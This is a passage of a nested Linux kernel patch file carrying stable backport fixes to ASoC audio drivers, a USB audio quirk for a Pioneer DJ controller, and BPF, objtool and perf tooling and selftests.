+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp63_writel(0x03, acp_base + ACP_CLKMUX_SEL);
+ 	acp63_enable_interrupts(acp_base);
+ 	return 0;
+ }
+@@ -106,7 +105,6 @@ static int acp63_deinit(void __iomem *acp_base, struct device *dev)
+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp63_writel(0, acp_base + ACP_CLKMUX_SEL);
+ 	acp63_writel(0, acp_base + ACP_CONTROL);
+ 	return 0;
+ }
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 4a69ce702360c..0acdf0156f075 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -269,6 +269,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A22"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index c223d83e02cfb..f2b5032daa6ae 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -356,6 +356,19 @@ static const struct snd_kcontrol_new cs35l41_aud_controls[] = {
+ 	WM_ADSP_FW_CONTROL("DSP1", 0),
+ };
+ 
++static void cs35l41_boost_enable(struct cs35l41_private *cs35l41, unsigned int enable)
++{
++	switch (cs35l41->hw_cfg.bst_type) {
++	case CS35L41_INT_BOOST:
++		enable = enable ? CS35L41_BST_EN_DEFAULT : CS35L41_BST_DIS_FET_OFF;
++		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2, CS35L41_BST_EN_MASK,
++				enable << CS35L41_BST_EN_SHIFT);
++		break;
++	default:
++		break;
++	}
++}
++
+ static irqreturn_t cs35l41_irq(int irq, void *data)
+ {
+ 	struct cs35l41_private *cs35l41 = data;
+@@ -431,8 +444,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 
+ 	if (status[0] & CS35L41_BST_OVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "VBST Over Voltage error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_OVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -441,16 +453,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_OVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_OVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_DCM_UVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "DCM VBST Under Voltage Error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_DCM_UVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -459,16 +468,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_UVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_UVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_SHORT_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "LBST error: powering off!\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_SHORT_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -477,9 +483,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_SHORT_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_SHORT_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+diff --git a/sound/soc/codecs/da7213.c b/sound/soc/codecs/da7213.c
+index 544ccbcfc8844..5678683c71bee 100644
+--- a/sound/soc/codecs/da7213.c
++++ b/sound/soc/codecs/da7213.c
+@@ -1996,6 +1996,11 @@ static int da7213_i2c_probe(struct i2c_client *i2c)
+ 	return ret;
+ }
+ 
++static void da7213_i2c_remove(struct i2c_client *i2c)
++{
++	pm_runtime_disable(&i2c->dev);
++}
++
+ static int __maybe_unused da7213_runtime_suspend(struct device *dev)
+ {
+ 	struct da7213_priv *da7213 = dev_get_drvdata(dev);
+@@ -2039,6 +2044,7 @@ static struct i2c_driver da7213_i2c_driver = {
+ 		.pm = &da7213_pm,
+ 	},
+ 	.probe_new	= da7213_i2c_probe,
++	.remove		= da7213_i2c_remove,
+ 	.id_table	= da7213_i2c_id,
+ };
+ 
+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index 056c3082fe02c..f7d7a9c91e04c 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -842,12 +842,14 @@ static int es8316_i2c_probe(struct i2c_client *i2c_client)
+ 	es8316->irq = i2c_client->irq;
+ 	mutex_init(&es8316->lock);
+ 
+-	ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
+-					"es8316", es8316);
+-	if (ret) {
+-		dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
+-		es8316->irq = -ENXIO;
++	if (es8316->irq > 0) {
++		ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
++						IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
++						"es8316", es8316);
++		if (ret) {
++			dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
++			es8316->irq = -ENXIO;
++		}
+ 	}
+ 
+ 	return devm_snd_soc_register_component(&i2c_client->dev,
+diff --git a/sound/soc/fsl/fsl_mqs.c b/sound/soc/fsl/fsl_mqs.c
+index 4922e6795b73f..32d20d351bbf7 100644
+--- a/sound/soc/fsl/fsl_mqs.c
++++ b/sound/soc/fsl/fsl_mqs.c
+@@ -210,10 +210,10 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		mqs_priv->regmap = syscon_node_to_regmap(gpr_np);
++		of_node_put(gpr_np);
+ 		if (IS_ERR(mqs_priv->regmap)) {
+ 			dev_err(&pdev->dev, "failed to get gpr regmap\n");
+-			ret = PTR_ERR(mqs_priv->regmap);
+-			goto err_free_gpr_np;
++			return PTR_ERR(mqs_priv->regmap);
+ 		}
+ 	} else {
+ 		regs = devm_platform_ioremap_resource(pdev, 0);
+@@ -242,8 +242,7 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	if (IS_ERR(mqs_priv->mclk)) {
+ 		dev_err(&pdev->dev, "failed to get the clock: %ld\n",
+ 			PTR_ERR(mqs_priv->mclk));
+-		ret = PTR_ERR(mqs_priv->mclk);
+-		goto err_free_gpr_np;
++		return PTR_ERR(mqs_priv->mclk);
+ 	}
+ 
+ 	dev_set_drvdata(&pdev->dev, mqs_priv);
+@@ -252,13 +251,9 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	ret = devm_snd_soc_register_component(&pdev->dev, &soc_codec_fsl_mqs,
+ 			&fsl_mqs_dai, 1);
+ 	if (ret)
+-		goto err_free_gpr_np;
+-	return 0;
+-
+-err_free_gpr_np:
+-	of_node_put(gpr_np);
++		return ret;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int fsl_mqs_remove(struct platform_device *pdev)
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 79e0039c79a38..5a12940ef9070 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -533,6 +533,18 @@ static int byt_rt5640_aif1_hw_params(struct snd_pcm_substream *substream,
+ 
+ /* Please keep this list alphabetically sorted */
+ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
++	{	/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)(BYT_RT5640_DMIC1_MAP |
++					BYT_RT5640_JD_SRC_JD1_IN4P |
++					BYT_RT5640_OVCD_TH_1500UA |
++					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{	/* Acer Iconia Tab 8 W1-810 */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Acer"),
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index d2ed807abde95..767fa89d08708 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -213,6 +213,17 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_SDW_PCH_DMIC |
+ 					RT711_JD1),
+ 	},
++	{
++		/* NUC15 'Rooks County' LAPRC510 and LAPRC710 skews */
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel(R) Client Systems"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LAPRC"),
++		},
++		.driver_data = (void *)(SOF_SDW_TGL_HDMI |
++					SOF_SDW_PCH_DMIC |
++					RT711_JD2_100K),
++	},
+ 	/* TigerLake-SDCA devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 28dd2046e4ac5..d8c80041388a7 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -354,6 +354,20 @@ static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link3[] = {
+ 	{}
+ };
+ 
++static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link2[] = {
++	{
++		.mask = BIT(0),
++		.num_adr = ARRAY_SIZE(rt711_sdca_0_adr),
++		.adr_d = rt711_sdca_0_adr,
++	},
++	{
++		.mask = BIT(2),
++		.num_adr = ARRAY_SIZE(rt1316_2_single_adr),
++		.adr_d = rt1316_2_single_adr,
++	},
++	{}
++};
++
+ static const struct snd_soc_acpi_adr_device mx8373_2_adr[] = {
+ 	{
+ 		.adr = 0x000223019F837300ull,
+@@ -624,6 +638,12 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_sdw_machines[] = {
+ 		.drv_name = "sof_sdw",
+ 		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l3.tplg",
+ 	},
++	{
++		.link_mask = 0x5, /* 2 active links required */
++		.links = adl_sdw_rt711_link0_rt1316_link2,
++		.drv_name = "sof_sdw",
++		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l2.tplg",
++	},
+ 	{
+ 		.link_mask = 0x1, /* link0 required */
+ 		.links = adl_rvp,
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index e7aa6f360cabe..d649b0cf4744f 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -622,6 +622,9 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
+ 			return ret;
+ 		}
+ 
++		/* inherit atomicity from DAI link */
++		be_pcm->nonatomic = rtd->dai_link->nonatomic;
++
+ 		rtd->pcm = be_pcm;
+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
+index 579a44d81d9a3..d409b99af75b2 100644
+--- a/sound/soc/soc-pcm.c
++++ b/sound/soc/soc-pcm.c
+@@ -1649,10 +1649,14 @@ static void dpcm_runtime_setup_fe(struct snd_pcm_substream *substream)
+ 	struct snd_pcm_hardware *hw = &runtime->hw;
+ 	struct snd_soc_dai *dai;
+ 	int stream = substream->stream;
++	u64 formats = hw->formats;
+ 	int i;
+ 
+ 	soc_pcm_hw_init(hw);
+ 
++	if (formats)
++		hw->formats &= formats;
++
+ 	for_each_rtd_cpu_dais(fe, i, dai) {
+ 		struct snd_soc_pcm_stream *cpu_stream;
+ 
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 271884e350035..efb4a3311cc59 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -3884,6 +3884,64 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 	}
+ },
+ 
++{
++	/*
++	 * PIONEER DJ DDJ-800
++	 * PCM is 6 channels out, 6 channels in @ 44.1 fixed
++	 * The Feedback for the output is the input
++	 */
++	USB_DEVICE_VENDOR_SPEC(0x2b73, 0x0029),
++		.driver_info = (unsigned long) &(const struct snd_usb_audio_quirk) {
++		.ifnum = QUIRK_ANY_INTERFACE,
++		.type = QUIRK_COMPOSITE,
++		.data = (const struct snd_usb_audio_quirk[]) {
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x01,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x82,
++					.ep_idx = 1,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC|
++					USB_ENDPOINT_USAGE_IMPLICIT_FB,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = -1
++			}
++		}
++	}
++},
++
+ /*
+  * MacroSilicon MS2100/MS2106 based AV capture cards
+  *
+diff --git a/tools/arch/x86/kcpuid/cpuid.csv b/tools/arch/x86/kcpuid/cpuid.csv
+index 4f1c4b0c29e98..9914bdf4fc9ec 100644
+--- a/tools/arch/x86/kcpuid/cpuid.csv
++++ b/tools/arch/x86/kcpuid/cpuid.csv
+@@ -184,8 +184,8 @@
+ 	 7,    0,  EBX,     27, avx512er, AVX512 Exponent Reciproca instr
+ 	 7,    0,  EBX,     28, avx512cd, AVX512 Conflict Detection instr
+ 	 7,    0,  EBX,     29, sha, Intel Secure Hash Algorithm Extensions instr
+-	 7,    0,  EBX,     26, avx512bw, AVX512 Byte & Word instr
+-	 7,    0,  EBX,     28, avx512vl, AVX512 Vector Length Extentions (VL)
++	 7,    0,  EBX,     30, avx512bw, AVX512 Byte & Word instr
++	 7,    0,  EBX,     31, avx512vl, AVX512 Vector Length Extentions (VL)
+ 	 7,    0,  ECX,      0, prefetchwt1, X
+ 	 7,    0,  ECX,      1, avx512vbmi, AVX512 Vector Byte Manipulation Instructions
+ 	 7,    0,  ECX,      2, umip, User-mode Instruction Prevention
+diff --git a/tools/bpf/bpftool/json_writer.c b/tools/bpf/bpftool/json_writer.c
+index 7fea83bedf488..bca5dd0a59e34 100644
+--- a/tools/bpf/bpftool/json_writer.c
++++ b/tools/bpf/bpftool/json_writer.c
+@@ -80,9 +80,6 @@ static void jsonw_puts(json_writer_t *self, const char *str)
+ 		case '"':
+ 			fputs("\\\"", self->out);
+ 			break;
+-		case '\'':
+-			fputs("\\\'", self->out);
+-			break;
+ 		default:
+ 			putc(*str, self->out);
+ 		}
+diff --git a/tools/bpf/bpftool/xlated_dumper.c b/tools/bpf/bpftool/xlated_dumper.c
+index 6fe3134ae45d4..3daa05d9bbb73 100644
+--- a/tools/bpf/bpftool/xlated_dumper.c
++++ b/tools/bpf/bpftool/xlated_dumper.c
+@@ -372,8 +372,15 @@ void dump_xlated_for_graph(struct dump_data *dd, void *buf_start, void *buf_end,
+ 	struct bpf_insn *insn_start = buf_start;
+ 	struct bpf_insn *insn_end = buf_end;
+ 	struct bpf_insn *cur = insn_start;
++	bool double_insn = false;
+ 
+ 	for (; cur <= insn_end; cur++) {
++		if (double_insn) {
++			double_insn = false;
++			continue;
++		}
++		double_insn = cur->code == (BPF_LD | BPF_IMM | BPF_DW);
++
+ 		printf("% 4d: ", (int)(cur - insn_start + start_idx));
+ 		print_bpf_insn(&cbs, cur, true);
+ 		if (cur != insn_end)
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 464ca3f01fe7a..bd260134c4201 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -6901,6 +6901,17 @@ struct bpf_list_node {
+ 	__u64 :64;
+ } __attribute__((aligned(8)));
+ 
++struct bpf_rb_root {
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
++struct bpf_rb_node {
++	__u64 :64;
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
+ struct bpf_sysctl {
+ 	__u32	write;		/* Sysctl is being read (= 0) or written (= 1).
+ 				 * Allows 1,2,4-byte read, but no write.
+diff --git a/tools/lib/bpf/gen_loader.c b/tools/lib/bpf/gen_loader.c
+index 23f5c46708f8f..b74c82bb831e6 100644
+--- a/tools/lib/bpf/gen_loader.c
++++ b/tools/lib/bpf/gen_loader.c
+@@ -804,11 +804,13 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 		return;
+ 	/* try to copy from existing ldimm64 insn */
+ 	if (kdesc->ref > 1) {
+-		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
+-			       kdesc->insn + offsetof(struct bpf_insn, imm));
+ 		move_blob2blob(gen, insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm), 4,
+ 			       kdesc->insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm));
+-		/* jump over src_reg adjustment if imm is not 0, reuse BPF_REG_0 from move_blob2blob */
++		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
++			       kdesc->insn + offsetof(struct bpf_insn, imm));
++		/* jump over src_reg adjustment if imm (btf_id) is not 0, reuse BPF_REG_0 from move_blob2blob
++		 * If btf_id is zero, clear BPF_PSEUDO_BTF_ID flag in src_reg of ld_imm64 insn
++		 */
+ 		emit(gen, BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 3));
+ 		goto clear_src_reg;
+ 	}
+@@ -831,7 +833,7 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 	emit(gen, BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_7,
+ 			      sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm)));
+ 	/* skip src_reg adjustment */
+-	emit(gen, BPF_JMP_IMM(BPF_JSGE, BPF_REG_7, 0, 3));
++	emit(gen, BPF_JMP_IMM(BPF_JA, 0, 0, 3));
+ clear_src_reg:
+ 	/* clear bpf_object__relocate_data's src_reg assignment, otherwise we get a verifier failure */
+ 	reg_mask = src_reg_mask();
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index ea1e7cdeb1b34..3b1e19894b21a 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -2913,17 +2913,6 @@ static int update_cfi_state(struct instruction *insn,
+ 				break;
+ 			}
+ 
+-			if (!cfi->drap && op->src.reg == CFI_SP &&
+-			    op->dest.reg == CFI_BP && cfa->base == CFI_SP &&
+-			    check_reg_frame_pos(&regs[CFI_BP], -cfa->offset + op->src.offset)) {
+-
+-				/* lea disp(%rsp), %rbp */
+-				cfa->base = CFI_BP;
+-				cfa->offset -= op->src.offset;
+-				cfi->bp_scratch = false;
+-				break;
+-			}
+-
+ 			if (op->src.reg == CFI_SP && cfa->base == CFI_SP) {
+ 
+ 				/* drap: lea disp(%rsp), %drap */
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index d4b04fa07a119..e088cfced1932 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -2444,6 +2444,7 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 			       char type, u64 start)
+ {
+ 	struct sym_args *args = arg;
++	u64 size;
+ 
+ 	if (!kallsyms__is_function(type))
+ 		return 0;
+@@ -2453,7 +2454,9 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 		args->start = start;
+ 	}
+ 	/* Don't know exactly where the kernel ends, so we add a page */
+-	args->size = round_up(start, page_size) + page_size - args->start;
++	size = round_up(start, page_size) + page_size - args->start;
++	if (size > args->size)
++		args->size = size;
+ 
+ 	return 0;
+ }
+diff --git a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+index 0ac860c8dd2b8..7145c5890de02 100644
+--- a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
++++ b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+@@ -1998,6 +1998,8 @@ static void intel_pt_calc_cbr(struct intel_pt_decoder *decoder)
+ 
+ 	decoder->cbr = cbr;
+ 	decoder->cbr_cyc_to_tsc = decoder->max_non_turbo_ratio_fp / cbr;
++	decoder->cyc_ref_timestamp = decoder->timestamp;
++	decoder->cycle_cnt = 0;
+ 
+ 	intel_pt_mtc_cyc_cnt_cbr(decoder);
+ }
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index 01de33191226b..596caa1765820 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -95,7 +95,7 @@ static int __start_server(int type, int protocol, const struct sockaddr *addr,
+ 	if (reuseport &&
+ 	    setsockopt(fd, SOL_SOCKET, SO_REUSEPORT, &on, sizeof(on))) {
+ 		log_err("Failed to set SO_REUSEPORT");
+-		return -1;
++		goto error_close;
+ 	}
+ 
+ 	if (bind(fd, addr, addrlen) < 0) {
+diff --git a/tools/testing/selftests/bpf/prog_tests/align.c b/tools/testing/selftests/bpf/prog_tests/align.c
+index 4666f88f2bb4f..8baebb41541dc 100644
+--- a/tools/testing/selftests/bpf/prog_tests/align.c
++++ b/tools/testing/selftests/bpf/prog_tests/align.c
+@@ -575,14 +575,14 @@ static struct bpf_align_test tests[] = {
+ 			/* New unknown value in R7 is (4n), >= 76 */
+ 			{14, "R7_w=scalar(umin=76,umax=1096,var_off=(0x0; 0x7fc))"},
+ 			/* Adding it to packet pointer gives nice bounds again */
+-			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off (0)
+ 			 * which is 2.  Then the variable offset is (4n+2), so
+ 			 * the total offset is 4-byte aligned and meets the
+ 			 * load's requirements.
+ 			 */
+-			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 		},
+ 	},
+ };
+diff --git a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+index 621c572221918..63ee892bc7573 100644
+--- a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
++++ b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+@@ -56,8 +56,9 @@ static bool assert_storage_noexist(struct bpf_map *map, const void *key)
+ 
+ static bool connect_send(const char *cgroup_path)
+ {
+-	bool res = true;
+ 	int server_fd = -1, client_fd = -1;
++	char message[] = "message";
++	bool res = true;
+ 
+ 	if (join_cgroup(cgroup_path))
+ 		goto out_clean;
+@@ -70,7 +71,10 @@ static bool connect_send(const char *cgroup_path)
+ 	if (client_fd < 0)
+ 		goto out_clean;
+ 
+-	if (send(client_fd, "message", strlen("message"), 0) < 0)
++	if (send(client_fd, &message, sizeof(message), 0) < 0)
++		goto out_clean;
++
++	if (read(server_fd, &message, sizeof(message)) < 0)
+ 		goto out_clean;
+ 
+ 	res = false;
+diff --git a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+index 5308de1ed478e..2715c68301f52 100644
+--- a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
++++ b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+@@ -65,6 +65,7 @@ void test_get_stackid_cannot_attach(void)
+ 	skel->links.oncpu = bpf_program__attach_perf_event(skel->progs.oncpu,
+ 							   pmu_fd);
+ 	ASSERT_OK_PTR(skel->links.oncpu, "attach_perf_event_callchain");
++	bpf_link__destroy(skel->links.oncpu);
+ 	close(pmu_fd);
+ 
+ 	/* add exclude_callchain_kernel, attach should fail */
+diff --git a/tools/testing/selftests/bpf/prog_tests/linked_list.c b/tools/testing/selftests/bpf/prog_tests/linked_list.c
+index 9a7d4c47af633..c456b34a823ac 100644
+--- a/tools/testing/selftests/bpf/prog_tests/linked_list.c
++++ b/tools/testing/selftests/bpf/prog_tests/linked_list.c
+@@ -58,12 +58,12 @@ static struct {
+ 	TEST(inner_map, pop_front)
+ 	TEST(inner_map, pop_back)
+ #undef TEST
+-	{ "map_compat_kprobe", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_kretprobe", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_tp", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_perf", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_raw_tp", "tracing progs cannot use bpf_list_head yet" },
+-	{ "map_compat_raw_tp_w", "tracing progs cannot use bpf_list_head yet" },
++	{ "map_compat_kprobe", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_kretprobe", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_tp", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_perf", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_raw_tp", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
++	{ "map_compat_raw_tp_w", "tracing progs cannot use bpf_{list_head,rb_root} yet" },
+ 	{ "obj_type_id_oor", "local type ID argument must be in range [0, U32_MAX]" },
+ 	{ "obj_new_no_composite", "bpf_obj_new type ID argument must be of a struct" },
+ 	{ "obj_new_no_struct", "bpf_obj_new type ID argument must be of a struct" },
+@@ -78,8 +78,6 @@ static struct {
+ 	{ "direct_write_head", "direct access to bpf_list_head is disallowed" },
+ 	{ "direct_read_node", "direct access to bpf_list_node is disallowed" },
+ 	{ "direct_write_node", "direct access to bpf_list_node is disallowed" },
+-	{ "write_after_push_front", "only read is supported" },
+-	{ "write_after_push_back", "only read is supported" },
+ 	{ "use_after_unlock_push_front", "invalid mem access 'scalar'" },
